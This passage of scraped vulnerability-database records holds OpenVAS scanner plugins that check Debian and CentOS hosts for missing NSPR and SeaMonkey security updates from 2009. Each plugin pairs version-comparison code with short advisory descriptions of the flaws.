http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in the NetScape Portable\nRuntime Library, which may lead to the execution of arbitrary code. 
The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2009-1563\n\nA programming error in the string handling code may lead to the\nexecution of arbitrary code.\n\nCVE-2009-2463\n\nAn integer overflow in the Base64 decoding functions may lead to\nthe execution of arbitrary code.\n\nThe old stable distribution (etch) doesn't contain nspr.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 4.7.1-5.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.8.2-1.\n\nWe recommend that you upgrade your NSPR packages.\";\ntag_summary = \"The remote host is missing an update to nspr\nannounced via advisory DSA 1931-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201931-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66211\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-2463\", \"CVE-2009-0689\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1931-1 (nspr)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-0d-dbg\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libnspr4-dev\", ver:\"4.7.1-5\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880851", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880851", "type": "openvas", "title": "CentOS Update for seamonkey CESA-2009:1531 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2009:1531 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# 
This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-October/016202.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880851\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:1531\");\n script_cve_id(\"CVE-2009-3380\", \"CVE-2009-3375\", \"CVE-2009-3274\", \"CVE-2009-0689\", \"CVE-2009-3376\");\n script_name(\"CentOS Update for seamonkey CESA-2009:1531 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'seamonkey'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", 
re:\"ssh/login/release=CentOS3\");\n script_tag(name:\"affected\", value:\"seamonkey on CentOS 3\");\n script_tag(name:\"insight\", value:\"SeaMonkey is an open source Web browser, email and newsgroup client, IRC\n chat client, and HTML editor.\n\n A flaw was found in the way SeaMonkey creates temporary file names for\n downloaded files. If a local attacker knows the name of a file SeaMonkey is\n going to download, they can replace the contents of that file with\n arbitrary contents. (CVE-2009-3274)\n\n A heap-based buffer overflow flaw was found in the SeaMonkey string to\n floating point conversion routines. A web page containing malicious\n JavaScript could crash SeaMonkey or, potentially, execute arbitrary code\n with the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\n A flaw was found in the way SeaMonkey handles text selection. A malicious\n website may be able to read highlighted text in a different domain (e.g.\n another website the user is viewing), bypassing the same-origin policy.\n (CVE-2009-3375)\n\n A flaw was found in the way SeaMonkey displays a right-to-left override\n character when downloading a file. In these cases, the name displayed in\n the title bar differs from the name displayed in the dialog body. An\n attacker could use this flaw to trick a user into downloading a file that\n has a file name or extension that differs from what the user expected.\n (CVE-2009-3376)\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n SeaMonkey. (CVE-2009-3380)\n\n All SeaMonkey users should upgrade to these updated packages, which correct\n these issues. 
After installing the update, SeaMonkey must be restarted for\n the changes to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) 
!= NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880670", "type": "openvas", "title": "CentOS Update for seamonkey CESA-2009:1531 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2009:1531 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-October/016204.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880670\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2009:1531\");\n script_cve_id(\"CVE-2009-3380\", \"CVE-2009-3375\", \"CVE-2009-3274\", \"CVE-2009-0689\", \"CVE-2009-3376\");\n script_name(\"CentOS Update for seamonkey CESA-2009:1531 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'seamonkey'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"seamonkey on CentOS 4\");\n script_tag(name:\"insight\", value:\"SeaMonkey is an open source Web browser, email and newsgroup client, IRC\n chat client, and HTML editor.\n\n A flaw was found in the way SeaMonkey creates temporary file names for\n downloaded files. 
If a local attacker knows the name of a file SeaMonkey is\n going to download, they can replace the contents of that file with\n arbitrary contents. (CVE-2009-3274)\n\n A heap-based buffer overflow flaw was found in the SeaMonkey string to\n floating point conversion routines. A web page containing malicious\n JavaScript could crash SeaMonkey or, potentially, execute arbitrary code\n with the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\n A flaw was found in the way SeaMonkey handles text selection. A malicious\n website may be able to read highlighted text in a different domain (e.g.\n another website the user is viewing), bypassing the same-origin policy.\n (CVE-2009-3375)\n\n A flaw was found in the way SeaMonkey displays a right-to-left override\n character when downloading a file. In these cases, the name displayed in\n the title bar differs from the name displayed in the dialog body. An\n attacker could use this flaw to trick a user into downloading a file that\n has a file name or extension that differs from what the user expected.\n (CVE-2009-3376)\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n SeaMonkey. (CVE-2009-3380)\n\n All SeaMonkey users should upgrade to these updated packages, which correct\n these issues. 
After installing the update, SeaMonkey must be restarted for\n the changes to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "Check for the Version of seamonkey", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880670", "href": 
"http://plugins.openvas.org/nasl.php?oid=880670", "type": "openvas", "title": "CentOS Update for seamonkey CESA-2009:1531 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2009:1531 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, email and newsgroup client, IRC\n chat client, and HTML editor.\n\n A flaw was found in the way SeaMonkey creates temporary file names for\n downloaded files. If a local attacker knows the name of a file SeaMonkey is\n going to download, they can replace the contents of that file with\n arbitrary contents. (CVE-2009-3274)\n \n A heap-based buffer overflow flaw was found in the SeaMonkey string to\n floating point conversion routines. A web page containing malicious\n JavaScript could crash SeaMonkey or, potentially, execute arbitrary code\n with the privileges of the user running SeaMonkey. (CVE-2009-1563)\n \n A flaw was found in the way SeaMonkey handles text selection. 
A malicious\n website may be able to read highlighted text in a different domain (e.g.\n another website the user is viewing), bypassing the same-origin policy.\n (CVE-2009-3375)\n \n A flaw was found in the way SeaMonkey displays a right-to-left override\n character when downloading a file. In these cases, the name displayed in\n the title bar differs from the name displayed in the dialog body. An\n attacker could use this flaw to trick a user into downloading a file that\n has a file name or extension that differs from what the user expected.\n (CVE-2009-3376)\n \n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n SeaMonkey. (CVE-2009-3380)\n \n All SeaMonkey users should upgrade to these updated packages, which correct\n these issues. After installing the update, SeaMonkey must be restarted for\n the changes to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"seamonkey on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-October/016204.html\");\n script_id(880670);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:1531\");\n script_cve_id(\"CVE-2009-3380\", \"CVE-2009-3375\", \"CVE-2009-3274\", \"CVE-2009-0689\", \"CVE-2009-3376\");\n script_name(\"CentOS Update for seamonkey CESA-2009:1531 centos4 i386\");\n\n script_summary(\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~50.el4.centos\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:36", "bulletinFamily": "scanner", "cvelist": 
["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "Check for the Version of seamonkey", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880851", "href": "http://plugins.openvas.org/nasl.php?oid=880851", "type": "openvas", "title": "CentOS Update for seamonkey CESA-2009:1531 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2009:1531 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, email and newsgroup client, IRC\n chat client, and HTML editor.\n\n A flaw was found in the way SeaMonkey creates temporary file names for\n downloaded files. If a local attacker knows the name of a file SeaMonkey is\n going to download, they can replace the contents of that file with\n arbitrary contents. (CVE-2009-3274)\n \n A heap-based buffer overflow flaw was found in the SeaMonkey string to\n floating point conversion routines. 
A web page containing malicious\n JavaScript could crash SeaMonkey or, potentially, execute arbitrary code\n with the privileges of the user running SeaMonkey. (CVE-2009-1563)\n \n A flaw was found in the way SeaMonkey handles text selection. A malicious\n website may be able to read highlighted text in a different domain (e.g.\n another website the user is viewing), bypassing the same-origin policy.\n (CVE-2009-3375)\n \n A flaw was found in the way SeaMonkey displays a right-to-left override\n character when downloading a file. In these cases, the name displayed in\n the title bar differs from the name displayed in the dialog body. An\n attacker could use this flaw to trick a user into downloading a file that\n has a file name or extension that differs from what the user expected.\n (CVE-2009-3376)\n \n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n SeaMonkey. (CVE-2009-3380)\n \n All SeaMonkey users should upgrade to these updated packages, which correct\n these issues. 
After installing the update, SeaMonkey must be restarted for\n the changes to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"seamonkey on CentOS 3\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-October/016202.html\");\n script_id(880851);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:1531\");\n script_cve_id(\"CVE-2009-3380\", \"CVE-2009-3375\", \"CVE-2009-3274\", \"CVE-2009-0689\", \"CVE-2009-3376\");\n script_name(\"CentOS Update for seamonkey CESA-2009:1531 centos3 i386\");\n\n script_summary(\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", 
rpm:\"seamonkey-chat~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.47.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "The remote host is missing updates announced in\nadvisory 
RHSA-2009:1531.\n\nSeaMonkey is an open source Web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nA flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file SeaMonkey is\ngoing to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary code\nwith the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A malicious\nwebsite may be able to read highlighted text in a different domain (e.g.\nanother website the user is viewing), bypassing the same-origin policy.\n(CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differs from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that differs from what the user expected.\n(CVE-2009-3376)\n\nSeveral flaws were found in the 